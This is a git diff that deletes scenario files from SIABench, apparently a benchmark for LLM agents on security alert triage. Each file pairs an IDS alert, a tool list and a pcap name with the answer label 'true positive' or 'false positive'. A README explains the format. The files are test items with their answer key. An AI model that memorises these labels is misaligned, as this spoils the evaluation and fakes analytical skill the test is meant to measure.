100644 index 563c95ebc63814994c336ea7f297a238295633ae..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21665.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21665", - "alert_type": "True", - "alert_name": "dp_21665" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:05.533848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56624", - "alert": "1970-01-02T00:13:05.533848+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:56624", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json deleted file mode 100644 index f904b562d3af1c7dee54c5db18c74266e12728c8..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21666.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21666", - "alert_type": "True", - "alert_name": "dp_21666" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:08.368158+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "alert": "1970-01-02T00:13:08.368158+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49410", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json deleted file mode 100644 index 7132b7f077af38d070a082adeab2f5ea594e0ac0..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21670.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21670", - "alert_type": "True", - "alert_name": "dp_21670" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:11.316835+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "alert": "1970-01-02T00:13:11.316835+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49434", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json deleted file mode 100644 index 8fd37c709c63ab5d2b1a9673888059c85b5e2165..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21672.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21672", - "alert_type": "True", - "alert_name": "dp_21672" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:14.133760+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49446", - "alert": "1970-01-02T00:13:14.133760+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:49446", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json deleted file mode 100644 index 20575201fd3e86fefc955b02ff940d85380ca7a2..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21675.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21675", - "alert_type": "True", - "alert_name": "dp_21675" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:20.546693+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46796", - "alert": "1970-01-02T00:13:20.546693+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:46796", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json deleted file mode 100644 index 2d65feffbb3f8d29b27b42a52c05d05c930584b7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21681.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21681", - "alert_type": "True", - "alert_name": "dp_21681" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:29.179704+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36764", - "alert": "1970-01-02T00:13:29.179704+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36764", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json deleted file mode 100644 index bdd3cb7a4b615ab2f6e86b7565f7f0bb238997ba..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21683.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21683", - "alert_type": "True", - "alert_name": "dp_21683" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:35.575361+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36796", - "alert": "1970-01-02T00:13:35.575361+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36796", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json deleted file mode 100644 index 60e3afb2c934d7f6dea477bc1f2d030248a916f7..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21685.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21685", - "alert_type": "True", - "alert_name": "dp_21685" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:36.714284+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36816", - "alert": "1970-01-02T00:13:36.714284+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:36816", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json deleted file mode 100644 index b10c3da23e2ee19e4e3172e71e916161820fef80..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21687.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21687", - "alert_type": "True", - "alert_name": "dp_21687" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:39.070188+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "alert": "1970-01-02T00:13:39.070188+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51048", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json deleted file mode 100644 index 24e592c61582a619c001cc61b87a3857a00b2b92..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21691.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21691", - "alert_type": "True", - "alert_name": "dp_21691" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:44.449955+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51066", - "alert": "1970-01-02T00:13:44.449955+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:51066", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json deleted file mode 100644 index c3e8a1db10cbbd97e1b89eda2e38cad53b583092..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21693.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21693", - "alert_type": "True", - "alert_name": "dp_21693" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:49.892971+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43210", - "alert": "1970-01-02T00:13:49.892971+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43210", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json deleted file mode 100644 index f3a36a3f678a20498e2f612347dd48d55f4ed339..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21695.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21695", - "alert_type": "True", - "alert_name": "dp_21695" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60394", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:60394", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json deleted file mode 100644 index a330ca943d0340d647f078ae1012d0be40205d33..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21696.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21696", - "alert_type": "True", - "alert_name": "dp_21696" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43236", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43236", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json b/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json deleted file mode 100644 index 614ad6916c7d524e429af5cbc4938947f6ef7186..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset/Alert_Triaging_Dataset_TII/TP/scenario_dp_21699.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "dp_21699", - "alert_type": "True", - "alert_name": "dp_21699" - } - }, - { - "sia_components": { - "scenario": "The SOC team got an alert from the IDS. The alert is: 1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43270", - "alert": "1970-01-02T00:13:51.694678+0000 \"GPL TELNET Bad Login\" {TCP} 192.168.1.90:23 -> 192.168.1.70:43270", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "true positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/Alert_Triaging_Dataset.md b/SIABench-main/Alert_Triaging_Dataset_CIC/Alert_Triaging_Dataset.md deleted file mode 100644 index 6e7d02bcb3fb89c9e15a1796bf6bca4364abe19d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/Alert_Triaging_Dataset.md +++ /dev/null @@ -1,54 +0,0 @@ -## 🎯 Overview - -The following JSON format provides a standardized structure for security incident analysis scenarios. This format enables **Automated evaluation** of LLM agents in alert triaging tasks. - -## Structure Overview - -```json -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_9" - }, - "sia_components": { - "scenario": "Scenario description with alert included", - "alert": "Raw security alert from Snort", - "tools_available": ["tshark", "python", "grep", "..."], - "files_available": "capture.pcap", - "instructions": "Environment setup info", - "directory": "working_directory_path", - "questions": [ - { - "question": "Determine if the alert is false positive or true positive", - "answer": "..." - } - ] - } - } - ] -} -``` - -## Field Descriptions - -### Metadata -- **scenario_name**: Unique identifier for the scenario - -### SIA Components -- **scenario**: Background context for the security incident -- **alert**: Raw alert from IDS/IPS system -- **tools_available**: List of command-line tools for analysis -- **files_available**: Files provided for investigation -- **instructions**: Environment and usage guidelines -- **directory**: Working directory path -- **questions**: Array of questions with expected answers - -## Usage - -**For LLM Input:** Use all fields except `questions[].answer and alert` - -**For Evaluation:** Compare LLM responses against `questions[].answer` - - -**Artifacts:** The PCAP files are given in the following CICIDS - [link](https://drive.google.com/file/d/1a06-pXmFRuCPMQtbt6lqk1Vc7UGnG40m/view?usp=sharing and TII-SRC - [link](https://drive.google.com/file/d/1tcWJyJf61-aox8hS7q_CgzyXBKc-ustI/view?usp=sharing)). Each scenario name corresponds to its respective PCAP folder. diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_1.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_1.json deleted file mode 100644 index 87deb318528ff64702fa3fef09501a9a6933ec68..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_1.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "ds1", - "alert_type": "False", - "alert_name": "false_alert_1" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-12:48:48.967271 [**] [1:1546:18] \"SERVER-WEBAPP Cisco HTTP double-percent DOS attempt\" [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.10.9:4200 -> 151.101.208.166:80", - "alert": "07/03-12:48:48.967271 [**] [1:1546:18] \"SERVER-WEBAPP Cisco HTTP double-percent DOS attempt\" [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 192.168.10.9:4200 -> 151.101.208.166:80", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_10.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_10.json deleted file mode 100644 index c6af6df32f02dd3c8e958db08ef274520194c585..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_10.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_2", - "alert_type": "False", - "alert_name": "false_alert_2" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:33:03.601654 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.21.85:80 -> 192.168.10.25:49383", - "alert": "07/03-08:33:03.601654 [**] [1:1200:17] \"INDICATOR-COMPROMISE Invalid URL\" [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 104.88.21.85:80 -> 192.168.10.25:49383", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_11.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_11.json deleted file mode 100644 index 00fd791069b795ab243df591370d8b22a573d63d..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_11.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_3", - "alert_type": "False", - "alert_name": "false_alert_3" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:34:11.504893 [**] [1:385:8] \"PROTOCOL-ICMP traceroute\" [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.10.14 -> 13.107.4.50", - "alert": "07/03-08:34:11.504893 [**] [1:385:8] \"PROTOCOL-ICMP traceroute\" [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 192.168.10.14 -> 13.107.4.50", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_12.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_12.json deleted file mode 100644 index 72b4a31cb68de869ffbd8f27b0050cd60074fc42..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_12.json +++ /dev/null @@ -1,47 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "scenario_name": "monday_pri_2_4", - "alert_type": "False", - "alert_name": "false_alert_4" - } - }, - { - "sia_components": { - "scenario": "The soc team got an alert from the IDS. The alert is: 07/03-08:39:26.328394 [**] [1:649:15] \"INDICATOR-SHELLCODE x86 setgid 0\" [**] [Classification: A system call was detected] [Priority: 2] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "alert": "07/03-08:39:26.328394 [**] [1:649:15] \"INDICATOR-SHELLCODE x86 setgid 0\" [**] [Classification: A system call was detected] [Priority: 2] {TCP} 13.107.4.50:80 -> 192.168.10.15:49647", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcap", - "instructions": "\nYou are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_file)", - "questions": [ - { - "question": "Analyze the provided PCAP file and determine if the generated alert is a false positive or true positive.", - "answer": "false positive" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_13.json b/SIABench-main/Alert_Triaging_Dataset_CIC/alert_13.json deleted file mode 100644 index c1a2d2b02919b4c4b1ad256971b3dc5d72678f17..0000000000000000000000000000000000000000 --- a/SIABench-main/Alert_Triaging_Dataset_CIC/alert_13.json +++ /dev/null @@ -1,47 